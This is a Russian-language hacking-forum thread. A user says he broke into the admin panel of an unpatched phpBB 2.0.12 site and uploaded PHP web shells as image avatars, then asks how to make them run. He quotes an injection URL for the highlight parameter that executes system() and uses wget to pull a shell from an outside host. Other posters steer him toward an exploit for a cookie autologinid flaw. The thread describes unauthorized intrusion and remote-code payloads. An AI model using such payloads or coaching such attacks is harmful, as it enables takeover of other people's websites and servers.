Есть сайт -> на нём phpBB 2.0.12 -> смог проникнуть в админку и залить пхп-шелл как аватары, но они соответственно с расширениями .gif или .jpg и их нельзя запустить. Как можно воспользоваться этими "аватарами", или как залить на сайт шелл с расширением .php, чтобы его можно было запустить? Слышал, что можно через восстановление БД, но не знаю какой запрос и как именно писать. Весь день лазил по рунету, но так ничего и не нашёл, кроме того, что это можно сделать. ПОМОГИТЕ! ПОКАЖИТЕ ИЛИ ДАЙТЕ ССЫЛКИ!
На вашем сайте видел такой способ: http://target/phpbb2/viewtopic.php?xxx=wget%20http://shell/shell.php&p=123&highlight=%2527.system($_GET[xxx]).include%2527 Но он не работает.
Как менять расширения файлов через админку я не знаю, т.к. на том форуме нет никаких дополнительных модов вроде downloads! Голый непропатченый форум.
Нельзя там через файлы загрузить шелл. Понимаешь, эти строки выложены (мной кажется) для того чтобы те кто их использует ПОНИМАЛИ что они делают. Если просто вбить ее в браузер, заменив там адрес сайта то работать это будет в 10% случаев. Ты сначала пойми что это за баг а потом попробуй сам догадаться почему ничего не работает. Чтобы небыло опять двацпять надо смотреть видео и читать сорцы и статьи про phpBB
2 KEZ В той строке я понимаю, что мы в файл пытаемся включить наш же собственный запрос, но эта дырка уже не работает в версии 2.0.12. Я же говорю, весь день сегодня читал/смотрел, но так ничего и не нашёл. Наверное просто не знаю что именно искать. Поэтому и прошу помощи. Мне кажется, в данной ситуации нужно пытаться через восстановление БД, но я не знаю какой именно запрос и в какой части базы писать, т.к. практически не знаю MySQL. Подскажите плиз. Или дайте линки, где читать.
Ну руками это будет сделать непросто, попробуй сплойтик... Есть там один для дырки в autologinid переменной в кукисах... Видео смотри оно есть
